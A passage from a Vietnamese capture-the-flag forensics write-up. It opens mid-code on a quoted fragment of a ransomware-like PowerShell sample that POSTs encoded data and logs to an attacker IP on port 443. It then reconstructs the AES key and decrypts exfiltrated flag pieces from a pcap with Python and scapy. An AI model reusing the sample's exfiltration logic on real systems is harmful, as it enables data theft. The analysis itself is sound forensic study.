-Method POST -Body $B64Logs 2>&1> $null } ``` * Ta thấy lệnh Invoke-WebRequest để thực hiện yêu cầu HTTP POST sử dụng ``"$7CiB`:$UFX/data"`` với biến `$7CiB` là tham số thứ 3 khi process name đã show ở trên được chạy, đó là ip của attacker * Tương ứng với biến `$UFX` là tham số thứ 5 đó là port 443 và post đến thư mục tương ứng là data với biến `$XoX` và thư mục logs với biến `$B64Logs` * Có một điều thú vị là để lấy key `$WiETm` nhưng trong hàm trên nó là 1 được đã bị mã hóa aes bằng 1 key khác và muốn giải mã thì bây giờ mình sẽ vào đọc dữ liệu trong file pcap để lấy giá trị của biến `$XoX` : * ![Screenshot 2024-10-10 215147](https://hackmd.io/_uploads/ByZz5DrJJl.png) `$XoX="0IzL5AzL5_DItASOwoDMwAiPgQmb2ZWMiBHZ18Gat4Wa3BiPgI3b0Fmc0NXaulWbkFGI+AiWsZ_TkRFaupFVaNjYqZ_akpnV0RmbWVnWy40VTJjSRJ2X1cFZHZVUlhlTtQmbOBFTxQWWShFawV1V5MVUtp0STRkWxFlaORkTHZkRWRUV4ZlVOp0VnBiP"` * Bây giờ mình sẽ truy ngược lại để tìm ra tất cả các giá trị của những biến trên: ```python import base64 XoX="0IzL5AzL5_DItASOwoDMwAiPgQmb2ZWMiBHZ18Gat4Wa3BiPgI3b0Fmc0NXaulWbkFGI+AiWsZ_TkRFaupFVaNjYqZ_akpnV0RmbWVnWy40VTJjSRJ2X1cFZHZVUlhlTtQmbOBFTxQWWShFawV1V5MVUtp0STRkWxFlaORkTHZkRWRUV4ZlVOp0VnBiP" print(base64.b64decode(XoX[::-1].replace("-","C").replace("_","E").strip())) ``` Output:`>gWJNVVxUDVFFGNDNjQqZDSKJmQS9WUphXRYd1LPNnd-NXeQVGdW5_bQJ2SWN2ZuVndtVzdhFjb3ZTZnhTdLFlZ > administrator > win-ho5dpb1fvnd > 00:09 - 19/09/24` ,tương ứng với các biến: `> $cVl > $OgE > $zVSza > $7VEq` - Tiếp theo từ dữ liệu của biến `$cVl` mình lấy được dữ liệu biến `$cvf` với thuật toán của hàm `R64Encoder` như trên: `fQKu8ge6wn1aw5mvungcVKbPlNVtePysBvsO/WXExiQoRBbJH6jB3C4aET51USIZ` - Tiếp tục là lấy được giá trị của biến key `$Uz19o` trong trường hợp này: - `$OgE = ([Environment]::MachineName).ToLower() ; $zVSza = ([Environment]::UserName).ToLower() ; $I26 = "yaginote.txt" $7VEq = Get-Date -Format "HH:mm - dd/MM/yy" ; $Uz19o = $7VEq.replace(":","").replace(" ","").replace("-","").replace("/","")+$zVSza+$OgE` - Suy ra được giá trị biến `$Uz19o` : `0009190924win-ho5dpb1fvndadministrator` Bây giờ mình sẽ tiến hành decrypt aes để lấy giá trị của biến `$WiETm` thôi: - Source giải mã AES-CBC ```python import base64 import hashlib from Crypto.Cipher import AES from binascii import unhexlify def fix_base64_padding(data): missing_padding = len(data) % 4 if missing_padding != 0: data += '=' * (4 - missing_padding) return data def decrypt(data, key): data = fix_base64_padding(data) data = base64.b64decode(data) iv = data[:16] data_enc = data[16:] cipher = AES.new(key, AES.MODE_CBC, iv) decrypted = cipher.decrypt(data_enc) pad_len = decrypted[-1] return decrypted[:-pad_len].decode('utf-8') key_s = "0009190924win-ho5dpb1fvndadministrator" key = hashlib.sha256(key_s.encode()).digest() WiETm=decrypt("fQKu8ge6wn1aw5mvungcVKbPlNVtePysBvsO/WXExiQoRBbJH6jB3C4aET51USIZ", key) print(WiETm) #YaMfem0zr4jdiZsDUxv1TH69 ``` **Giai đoạn đi lấy dữ liệu từ file pcap về và thực hiện giải mã** * Theo như dữ liệu ta tìm thấy ở trong resource của file dump có các file flag đã bị mã hóa, mình gửi lại ở dưới, : ``` # Giá trị trong file : randomFlag.txt ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_1.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_10.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_11.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_12.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_13.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_14.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_15.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_16.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_17.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_18.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_19.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_2.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_20.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_21.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_22.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_23.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_24.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_25.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_26.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_27.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_28.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_29.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_3.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_30.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_31.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_32.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_33.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_34.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_35.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_36.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_37.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_38.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_39.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_4.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_40.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_41.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_42.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_43.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_44.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_45.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_46.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_47.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_48.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_49.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_5.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_50.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_51.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_52.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_53.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_54.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_55.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_56.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_57.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_58.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_59.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_6.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_7.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_8.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_9.txt is now encrypted" ``` , Có lẻ flag đã bị cắt ra từng mảnh nhỏ và gửi lộn xộn theo như trên * Không vòng vo nữa mình sẽ viết 1 đoạn script để thực hiện lấy data flag về theo như thứ tự trên: ```python=1 from scapy.all import * import base64 import hashlib from Crypto.Cipher import AES from binascii import unhexlify packets = rdpcap("traffic.pcapng") def fix_base64_padding(data): missing_padding = len(data) % 4 if missing_padding != 0: data += '=' * (4 - missing_padding) return data def decrypt(data, key): key = unhexlify(key) iv = data[:16] data_enc = data[16:] cipher = AES.new(key, AES.MODE_CBC, iv) decrypted = cipher.decrypt(data_enc) pad_len = decrypted[-1] return decrypted[:-pad_len].decode('utf-8') def R64Decoder(data): data_str = data.decode('utf-8') data_str = data_str[::-1].replace("-", "C").replace("_", "E").strip() data_str = fix_base64_padding(data_str) data_ = base64.b64decode(data_str) return data_ data_flag = [] for packet in packets: if packet.haslayer(TCP): tcp_layer = packet.getlayer(TCP) if tcp_layer.haslayer(Raw) and tcp_layer.dport == 443: raw_payload = tcp_layer[Raw].load if len(raw_payload) == 43: raw_load_dec = R64Decoder(raw_payload) data_flag.append(raw_load_dec) # Vì lỗi nên mình chuyển key = "YaMfem0zr4jdiZsDUxv1TH69" sang sha256 ở ngoài original_key = "87db61d8626cfea8e091d71753d913116f53e49804ff6eb5b7eb69ef5a521ab8" data_key_flags = [] with open("randomFlag.txt", "r") as f: #Nội dung trong file này là đoạn trên mình có gửi lines = f.readlines() for line in lines: line = line.strip() if ".txt" in line and "_" in line: line = line.split(".txt")[0] line_split = line.split("_") if len(line_split) > 1: line_ = line_split[1] data_key_flags.append(line_) dic = {} for value, key_ in zip(data_flag, data_key_flags): key = int(key_) dic[key] = value for key_index, value in dic.items(): data = decrypt(value, original_key) dic[key_index] = data for i in range(1, 60): if i in dic: print(dic[i], end="") # ASCIS{N0th1n9_1$_m0r3_pr3c10u5_7h4n_1ndEp3ndenc3_&_fr33d0m} ```